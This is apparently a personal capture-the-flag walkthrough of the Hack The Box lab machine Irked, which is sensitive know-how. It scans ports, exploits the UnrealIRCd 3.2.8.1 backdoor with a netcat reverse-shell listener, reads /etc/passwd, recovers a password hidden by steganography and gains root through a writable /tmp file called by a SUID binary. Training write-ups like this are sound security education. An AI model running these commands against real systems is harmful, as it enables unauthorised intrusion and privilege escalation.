Nathanule's Write-ups
  • Nathanule's Write-Ups
  • Cheat sheets and Notes
    • Windows Privilege escalation
      • Communication with processes
      • Windows User Privileges
        • Windows Privilege Overview
        • SeImpersonate and SeAssignPrimaryToken
        • SeDebugPrivilege
    • SMTP
    • Directory brute-forcing (Fuzzing web directories)
    • Fuzzing Subdomains and Virtual hosts
    • Pivoting, Tunneling, and Port Forwarding
      • Pivoting around obstacles
      • Branching out our tunnels
      • Cheat sheets
    • Transferring Files
    • Powershell Notes
    • Active Directory Notes/Cheat sheets
      • Initial Enumeration
        • External Recon
          • Hunting E-mail addresses, usernames, credentials
      • External Information Gathering
  • Walk-throughs
    • HTB Windows Machines
      • APT
      • Mantis HTB
      • Reel HTB
      • Flight HTB
      • Visual HTB
      • Worker HTB
      • Fuse HTB
      • Buff HTB
      • Granny HTB
      • Grandpa HTB
      • Optimum HTB
      • Legacy
      • Jerry HTB
      • Silo HTB
      • Sizzle HTB
      • Tally HTB
      • Bart HTB
      • Jeeves HTB
    • HTB Linux Machines
      • Zipping HTB
      • devvortex HTB
      • Magic HTB
      • Bizness HTB
      • Sua
      • Mango HTB
      • Haircut HTB
      • Postman HTB
      • Friendzoned HTB
      • Mirai HTB
      • Networked HTB
      • Popcorn HTB
      • Posion HTB
      • Sunday HTB
      • SwagShop HTB
      • Irked HTB
      • Academy
    • HTB Endgames
      • Hades
      • Xen
      • P.O.O
      • Hololive THM
    • WPE Capstones
      • Querier HTB
      • Bastion HTB
      • Bastard HTB
      • Arctic HTB
      • Alfred THM
    • LPE Capstones
      • Brainpan 1 THM
      • ConvertMyVideo THM
      • Tomghost THM
      • Lazy Admin THM
      • Anonymous THM
    • Mobile
      • APKey
    • Snap-labs (Entry Level Pentesting)
    • Hardware
      • The needle
      • Debugging Interface
    • ICS and SCADA
      • Watersnake
    • Blockchain
      • Survival of the Fittest
Powered by GitBook
On this page
  • Priv Esc via ircd
  • Priv Esc via djmardov
  1. Walk-throughs
  2. HTB Linux Machines

Irked HTB

IP 

10.10.10.117

Let's start with our initial Nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.117 | cut -d"/" -f1 | tr '\n' ','

we can see we have the following ports open

22,80,111,6697,8067,50932,65534

Lets run a more in-depth scan 

sudo nmap -sCV -p22,80,111,6697,8067,50932,65534 10.10.10.117 -oA PortScan

Results

Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-15 23:27 EST
Nmap scan report for 10.10.10.117
Host is up (0.028s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          43635/udp   status
|   100024  1          43892/tcp6  status
|   100024  1          50932/tcp   status
|_  100024  1          54829/udp6  status
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
50932/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.10 seconds

  • We do find the hostname irked.htb we can add this to our hosts file

HTTP Port 80

When we navigate to the web server we can see the following

  • we can confirm this is a Debian based server

  • and the Apache version matches that of the Nmap scan: Apache 2.4.10

Let's get feroxbuster running and see if we can find any interesting directories

feroxbuster -u http://10.10.10.117/ -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt

we do find 

http://10.10.10.117/manual/

  • Doesnt lead anywhere interesting but would be classed as information disclosure

Since this mentions IRC not a bad place to start enumerating

What is IRC protocol?

  • Internet Relay Chat is a text-based chat system for instant messaging between internet-connected computers, designed for group communication in forums, and one-on-one communication via private messages

  • IRC generally runs on the following ports 6667, 6697

We can see from our nmap scans it is running a service called UnrealIRCd

UnrealIRCd is an open-source IRC daemon that utilises the following ports

  • 6697

  • 8067

  • 65534

We can enumerate this daemon

Lets check for the service version using netcat

netcat 10.10.10.117 6697

  • No luck

After abit of reading we can connect to the service using a random nick name so lets try

netcat 10.10.10.117 6697
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
PASS shrek123
NICK shrek123
USER shrek123 atshrek Security :shrek123

we can see the version number Unreal3.2.8.1

  • After abit of googling we can be certain this version is vulnerable to RCE due to a backdoor in the software

Now lets exploit this and gain a shell on the system

we can use the following script

Lets start a netcat listner

rlwrap -cAr nc -lvnp 9001

we need to make some slight modifications to the script

  • add our local ip and port for the shell to connect back to

Now we should be able to run the script

python3 exploit.py -payload bash 10.10.10.117 6697

we know have a shell on the target

Priv Esc via ircd

First lets upgrade our shell

python3 -c "import pty;pty.spawn('/bin/bash')"

Lets find the version of debian

cat /etc/os-release

Lets find the kernel version

cat /proc/version

Lets check for any other users on the system

cat /etc/passwd

  • looks like there is one other user on the system

  • djmardov

Lets find what groups we are in and the user djmardov

groups ircd
groups djmardov

Results 

ircd@irked:/$ groups ircd
groups ircd
ircd : ircd
ircd@irked:/$ groups djmardov
groups djmardov
djmardov : djmardov cdrom floppy audio dip video plugdev netdev lpadmin scanner bluetooth

Lets see if we can find any interesting files within the system

SUID files

find / -type f -perm /4000 2>/dev/null

Lets search for files with keywords and certain extensions

find / -type f -name "*.txt" 2>/dev/null
find / -type f -name "*pass*" 2>/dev/null
find / -type f -name "*backup*" 2>/dev/null

we do find something interesting

When we read the file we can see a password

djmardov: UPupDOWNdownLRlrBAbaSSss

We saw ssh is available on the machine 

ssh djmardov@10.10.10.117

  • we get a Permission denied might only be acssesible by ssh keys

Lets see if we can just su into the user

su djmardov
su djmardov
Password: UPupDOWNdownLRlrBAbaSSss

  • No luck again

hmmmm

It took me a minute to notice the sentence super elite steg backup pw so stegenography, weird how the main page of the website only had an image could this be where our password is located

Let's download the image from the main web page

Now lets run steghide with our newly found password

steghide extract -sf irked.jpg

  • there was a pass.txt file located in the image

We know have the password Kab6h+m+bbp2J:HG Lets see if we can ssh into the machine now

ssh djmardov@10.10.10.117

  • it worked!

Priv Esc via djmardov

Now that we have a ssh session let's start enumerating

when we previously tried to find SUID bits there was one file that looked interesting 

find / -type f -perm /4000 2>/dev/null

Why does this program have the SUID bit set

when we run it 

/usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2023-12-15 21:13 (:0)
djmardov pts/1        2023-12-16 01:20 (10.10.14.7)
sh: 1: /tmp/listusers: not found

  • it fails because there is no file named /tmp/listusers can we just create one and gain a root shell

echo /bin/bash > /tmp/listusers
chmod 777 /tmp/listusers

Now if we run the viewuser programs we should get a root shell

and we do!!

PreviousSwagShop HTBNextAcademy

Last updated 1 year ago

LogoGitHub - Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor: My backdoor script for a vulnerable version of UnrealIRCdGitHub